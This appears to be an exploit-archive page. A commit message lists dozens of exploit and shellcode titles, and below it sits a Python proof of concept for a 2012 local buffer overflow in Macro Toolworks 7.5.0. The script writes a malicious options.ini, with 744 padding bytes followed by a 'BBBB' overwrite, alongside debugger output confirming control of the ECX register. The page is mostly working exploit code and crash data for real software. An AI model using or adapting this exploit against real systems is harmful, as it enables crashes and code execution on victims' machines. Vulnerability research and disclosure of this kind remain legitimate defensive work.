880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
75 lines
No EOL
2.8 KiB
Python
Executable file
75 lines
No EOL
2.8 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/52351/info
|
|
|
|
Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
|
|
|
Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
|
|
|
|
Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/python
|
|
|
|
# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
|
|
# Version: 7.5.0
|
|
# Date: 2012-03-04
|
|
# Author: Julien Ahrens
|
|
# Homepage: http://www.inshell.net
|
|
# Software Link: http://www.macrotoolworks.com
|
|
# Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
|
|
# Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
|
|
# Howto: Copy options.ini to App-Dir --> Launch
|
|
|
|
# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242
|
|
(exc.code c0000005, tid 3128)
|
|
|
|
# Registers:
|
|
# EAX 0120EA00 Stack[000004C8]:0120EA00
|
|
# EBX FFFFFFFF
|
|
# ECX 42424242
|
|
# EDX 00000002
|
|
# ESI 007F6348 _prog.exe:007F6348
|
|
# EDI 007F6348 _prog.exe:007F6348
|
|
# EBP 0120EA0C Stack[000004C8]:0120EA0C
|
|
# ESP 0120E9E8 Stack[000004C8]:0120E9E8
|
|
# EIP 00646D36 _prog.exe:00646D36
|
|
# EFL 00200206
|
|
|
|
# Stack:
|
|
# 0120E9E0 0012DF3C
|
|
# 0120E9E4 00000000
|
|
# 0120E9E8 0205A5A0 debug045:0205A5A0
|
|
# 0120E9EC 1B879EF8
|
|
# 0120E9F0 007F6348 _prog.exe:007F6348
|
|
# 0120E9F4 007F6348 _prog.exe:007F6348
|
|
|
|
# Crash:
|
|
# _prog.exe:00646D36 ; ---------------------------------------------------------------------------
|
|
# _prog.exe:00646D36 mov eax, [ecx]
|
|
# _prog.exe:00646D38 call dword ptr [eax+0Ch]
|
|
# _prog.exe:00646D3B call near ptr unk_6750D0
|
|
# _prog.exe:00646D40 retn 4
|
|
# _prog.exe:00646D40 ; ---------------------------------------------------------------------------
|
|
|
|
# Dump:
|
|
# 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
# 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
|
# 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC
|
|
# 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
|
|
# 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
|
|
|
|
file="options.ini"
|
|
|
|
junk1="\x41" * 744
|
|
boom="\x42\x42\x42\x42"
|
|
junk2="\x43" * 100
|
|
|
|
poc="[last]\n"
|
|
poc=poc + "file=" + junk1 + boom + junk2
|
|
|
|
try:
|
|
print "[*] Creating exploit file...\n"
|
|
writeFile = open (file, "w")
|
|
writeFile.write( poc )
|
|
writeFile.close()
|
|
print "[*] File successfully created!"
|
|
except:
|
|
print "[!] Error while creating file!" |